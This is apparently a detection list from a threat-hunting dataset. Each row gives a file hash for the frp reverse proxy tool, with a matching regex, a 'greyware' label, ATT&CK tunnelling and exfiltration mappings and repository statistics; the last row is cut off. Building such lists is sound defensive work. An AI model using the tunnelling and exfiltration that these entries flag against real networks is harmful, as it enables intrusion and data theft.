"*b9a1a2387b9b07ec6be9d28e5ed9639c1ea29d41a84bc3a62b39ab476459b1ff*",".{0,1000}b9a1a2387b9b07ec6be9d28e5ed9639c1ea29d41a84bc3a62b39ab476459b1ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*b9c79acc881c58b0185465a5ded032d6210637f860712f04ecb800b66453d125*",".{0,1000}b9c79acc881c58b0185465a5ded032d6210637f860712f04ecb800b66453d125.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ba4439ded52eb5c5994dd10181ff83ef350933753198e50bf04b5f21333f2a12*",".{0,1000}ba4439ded52eb5c5994dd10181ff83ef350933753198e50bf04b5f21333f2a12.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bb8734f2be2907a2923aedf43757d6ff85a7c66af789b8dbef34ddaf2194f05f*",".{0,1000}bb8734f2be2907a2923aedf43757d6ff85a7c66af789b8dbef34ddaf2194f05f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*bbb1ab095f30e9ecf1b745579f6ecff80eff11fb712f2bc364a656fbec89f73b*",".{0,1000}bbb1ab095f30e9ecf1b745579f6ecff80eff11fb712f2bc364a656fbec89f73b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bc283cb6e280e5fd5089216c8362003235dcf371e9f99bbc14462a0ef05c0b53*",".{0,1000}bc283cb6e280e5fd5089216c8362003235dcf371e9f99bbc14462a0ef05c0b53.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bc886aea03ddb2d4201501904a25816ac962cd3fbe6bc7fab3ca05357069666d*",".{0,1000}bc886aea03ddb2d4201501904a25816ac962cd3fbe6bc7fab3ca05357069666d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bce6f8df72e0f942a3eaeca45ed59fbf929d887b9fcd30350944c5f72287cb73*",".{0,1000}bce6f8df72e0f942a3eaeca45ed59fbf929d887b9fcd30350944c5f72287cb73.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*bf8ab462d70a288b7ff2e9dda8151d16340ec4758843a619a936b7541f52fe54*",".{0,1000}bf8ab462d70a288b7ff2e9dda8151d16340ec4758843a619a936b7541f52fe54.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bf980fa58499e947581c6b89b100d55c1d417fdda6f7544422a4a6400248e20d*",".{0,1000}bf980fa58499e947581c6b89b100d55c1d417fdda6f7544422a4a6400248e20d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*bfbc703139c2fcf59d2fac2bb4afe3e60dd5f77dc12d84c8f420260f136c6721*",".{0,1000}bfbc703139c2fcf59d2fac2bb4afe3e60dd5f77dc12d84c8f420260f136c6721.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c0c02d53dea74824ba7a5a278d5e9974aed9d9d5f988606b9ad3507b8b051a7e*",".{0,1000}c0c02d53dea74824ba7a5a278d5e9974aed9d9d5f988606b9ad3507b8b051a7e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*c14ccd69607c34707120e7c2d2df9b6c0a11c7f40e22f116d75838e2038edba3*",".{0,1000}c14ccd69607c34707120e7c2d2df9b6c0a11c7f40e22f116d75838e2038edba3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c14d5be9b9d80a48354c04dd1c3f80167abae94a1854d2f5116e4e5a0da89b91*",".{0,1000}c14d5be9b9d80a48354c04dd1c3f80167abae94a1854d2f5116e4e5a0da89b91.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c17291696d623106324b9bad894599325a90148d7d19970b9142a445b789b571*",".{0,1000}c17291696d623106324b9bad894599325a90148d7d19970b9142a445b789b571.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c1b0377ee72dc62221e2c8ecf913a34e230222e86f5291f0813474a4fd7e9b24*",".{0,1000}c1b0377ee72dc62221e2c8ecf913a34e230222e86f5291f0813474a4fd7e9b24.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*c20f8abf5e0933bfd88fa974ad3a005c72f494aafc021916927774ab0ce6ca46*",".{0,1000}c20f8abf5e0933bfd88fa974ad3a005c72f494aafc021916927774ab0ce6ca46.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c32b3159a8aa089b08222987a32b9856c046c276898613c75eec62d370df7e01*",".{0,1000}c32b3159a8aa089b08222987a32b9856c046c276898613c75eec62d370df7e01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c35d5b705e2b321cf612bcdeb44ee27392d6a1202248e8ec30bf178adf00f9da*",".{0,1000}c35d5b705e2b321cf612bcdeb44ee27392d6a1202248e8ec30bf178adf00f9da.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c35dcc7b9549eacce4d5b34a07a3d102b0c631ef4b72682ce0472f65b8777d4a*",".{0,1000}c35dcc7b9549eacce4d5b34a07a3d102b0c631ef4b72682ce0472f65b8777d4a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*c3b011e15c03348592d4a2adcdb90994e7ed29a43f572945505a429c12645215*",".{0,1000}c3b011e15c03348592d4a2adcdb90994e7ed29a43f572945505a429c12645215.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c44853992b0d6d3f9f5c777038590ee6a5869dbeb6362dfa5537e9d730aa26f6*",".{0,1000}c44853992b0d6d3f9f5c777038590ee6a5869dbeb6362dfa5537e9d730aa26f6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c53b188ec3eb09f34484d2576f957e61522875c0e7a99e67722d41b2b57cdb4d*",".{0,1000}c53b188ec3eb09f34484d2576f957e61522875c0e7a99e67722d41b2b57cdb4d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c57526a8a0010b811b9bd367704125033fc71774f6a66dcfd4224ec5478e0490*",".{0,1000}c57526a8a0010b811b9bd367704125033fc71774f6a66dcfd4224ec5478e0490.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*c5b32aaedc7785b980be37519d95d0d3dc3ae86b3943bbf2ad7cb5dfc57460f0*",".{0,1000}c5b32aaedc7785b980be37519d95d0d3dc3ae86b3943bbf2ad7cb5dfc57460f0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c671953a8131c23c8039827f79fc96c021aac1e2b6dfff805ee68f490847b3ef*",".{0,1000}c671953a8131c23c8039827f79fc96c021aac1e2b6dfff805ee68f490847b3ef.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c68f67a262cf61a81945326e0e0c9e2a3dce209c3125bb0f05a16921141f4231*",".{0,1000}c68f67a262cf61a81945326e0e0c9e2a3dce209c3125bb0f05a16921141f4231.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c6f00c7458e7546b9339ce65805b2969abf55f95698f0b2f0904ed85f187b3fa*",".{0,1000}c6f00c7458e7546b9339ce65805b2969abf55f95698f0b2f0904ed85f187b3fa.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*c7b22ed0a87596cd839b555e4992d80691359e75409063b6dca2dda96e7da480*",".{0,1000}c7b22ed0a87596cd839b555e4992d80691359e75409063b6dca2dda96e7da480.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c842849be22802e6500167fc34fac869c584ad1f70b6c56dcc66d7391171d567*",".{0,1000}c842849be22802e6500167fc34fac869c584ad1f70b6c56dcc66d7391171d567.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c87ffc18bfa386cf946156f91fb8649a0cdbcd762550a0b8ab1f4774cb608455*",".{0,1000}c87ffc18bfa386cf946156f91fb8649a0cdbcd762550a0b8ab1f4774cb608455.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*c992b9a8a53c53465f035d5e254ecc1a9455f260fd110fe1600d5da4a37df413*",".{0,1000}c992b9a8a53c53465f035d5e254ecc1a9455f260fd110fe1600d5da4a37df413.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*ca1f8ec6c7236e7c9c31c1c40626c05a597e3bc6f647c1325439e2f825da9aee*",".{0,1000}ca1f8ec6c7236e7c9c31c1c40626c05a597e3bc6f647c1325439e2f825da9aee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ca7baeb243b5c264847067f6e5619311223f1741f73d5371ff7fa90698ff5a3b*",".{0,1000}ca7baeb243b5c264847067f6e5619311223f1741f73d5371ff7fa90698ff5a3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*cac2bc6fccb071789d7acc95f02470cfb935cfc9c7c6a1e6d91457e4ff11e8e1*",".{0,1000}cac2bc6fccb071789d7acc95f02470cfb935cfc9c7c6a1e6d91457e4ff11e8e1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*cc928db0c984d3a7e9822ebb7ac897ddb90f43848488a5c3261b5704085fa92a*",".{0,1000}cc928db0c984d3a7e9822ebb7ac897ddb90f43848488a5c3261b5704085fa92a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*cd1cdad2d88d638a820cac9c562bccba8dbbc42d3ac1ec8482d12105325a3adc*",".{0,1000}cd1cdad2d88d638a820cac9c562bccba8dbbc42d3ac1ec8482d12105325a3adc.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ce18273ca20bd38c567b0355ca2c85575651b39249294969daa51e568077a872*",".{0,1000}ce18273ca20bd38c567b0355ca2c85575651b39249294969daa51e568077a872.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*ce70a9a044271be4336d7376aa1d5c5f8de8497b1e284b083f6d2184d6f57042*",".{0,1000}ce70a9a044271be4336d7376aa1d5c5f8de8497b1e284b083f6d2184d6f57042.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*cf5cc61f68d705860538b8d3e865ae026a7b27e4da8c1c1a3f50c5e7827cd097*",".{0,1000}cf5cc61f68d705860538b8d3e865ae026a7b27e4da8c1c1a3f50c5e7827cd097.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*cf873001de9c33445213818c5844992e1a3a02486bd3defce556b95e9b0f4af0*",".{0,1000}cf873001de9c33445213818c5844992e1a3a02486bd3defce556b95e9b0f4af0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*cfc766cc82568e40d7198493340283cc0f4f42de97463aef863170f7e773ff9c*",".{0,1000}cfc766cc82568e40d7198493340283cc0f4f42de97463aef863170f7e773ff9c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d1d9b02741e5d8742853665aad6a36a74a977fb82108b894712008db8d170276*",".{0,1000}d1d9b02741e5d8742853665aad6a36a74a977fb82108b894712008db8d170276.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d21b617081093f98de5fc1e57700d4a104df67c4965f3fb99dc2650aefbce86f*",".{0,1000}d21b617081093f98de5fc1e57700d4a104df67c4965f3fb99dc2650aefbce86f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*d33d83e8b98ce5413603f71b1c0b38c1b5bbe1d1c826b7ada84a7543a6cc6ea6*",".{0,1000}d33d83e8b98ce5413603f71b1c0b38c1b5bbe1d1c826b7ada84a7543a6cc6ea6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d3a481b40889bf4c6fd35b18941de04ddaa2316ad51977a5af7bdddf3650f808*",".{0,1000}d3a481b40889bf4c6fd35b18941de04ddaa2316ad51977a5af7bdddf3650f808.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d458887ece9050b08d1d58c2718110643b87f254981cda6c86f25dd5559e3867*",".{0,1000}d458887ece9050b08d1d58c2718110643b87f254981cda6c86f25dd5559e3867.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d458d70dd88048d1fc898d5422ed570e912d3f3ef3ee5928871438a08514f725*",".{0,1000}d458d70dd88048d1fc898d5422ed570e912d3f3ef3ee5928871438a08514f725.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*d48623a74a00577be0409d912f8197a110f13192eab99d3959ceb11496ed0903*",".{0,1000}d48623a74a00577be0409d912f8197a110f13192eab99d3959ceb11496ed0903.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d5d2ee272caa314a731dcc59ed4474c9f34953c617e8c29fdd86ea8c017f2e91*",".{0,1000}d5d2ee272caa314a731dcc59ed4474c9f34953c617e8c29fdd86ea8c017f2e91.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d6373caf2bb26e7956c976d7d9142a082a0c259525bac3d5bb2fcfcbbfa63bc6*",".{0,1000}d6373caf2bb26e7956c976d7d9142a082a0c259525bac3d5bb2fcfcbbfa63bc6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d63b7a3365a5374daa0f9418d26334c3e913d762599071d1d7e629b2e675e4e7*",".{0,1000}d63b7a3365a5374daa0f9418d26334c3e913d762599071d1d7e629b2e675e4e7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*d7a7a6085fa6a9f8de0ae2c221c1ef110b9afc2a0122a058482ef3974d031ac0*",".{0,1000}d7a7a6085fa6a9f8de0ae2c221c1ef110b9afc2a0122a058482ef3974d031ac0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*d7c2ffe601af16d168d881b88817df81e9bc8646e56643545bd9a11f01ebac6a*",".{0,1000}d7c2ffe601af16d168d881b88817df81e9bc8646e56643545bd9a11f01ebac6a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*daf162e5cc90599aab036b7bb4ed6d4c521b2f5732a6cb40b08a00e6714deaa3*",".{0,1000}daf162e5cc90599aab036b7bb4ed6d4c521b2f5732a6cb40b08a00e6714deaa3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*db2975501126fc0f61097acdff7484655e5d37b01de8c509c2c5e0e88591fb42*",".{0,1000}db2975501126fc0f61097acdff7484655e5d37b01de8c509c2c5e0e88591fb42.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*db53bdef3b270e45fb9efc489af2948be7c7fa1e3a5cae9698f2832e628bcd3b*",".{0,1000}db53bdef3b270e45fb9efc489af2948be7c7fa1e3a5cae9698f2832e628bcd3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*db778fca7bf230b926b5ebb34d3b97bb3be5a89bec8254f824ccdd57ba2b31e8*",".{0,1000}db778fca7bf230b926b5ebb34d3b97bb3be5a89bec8254f824ccdd57ba2b31e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data 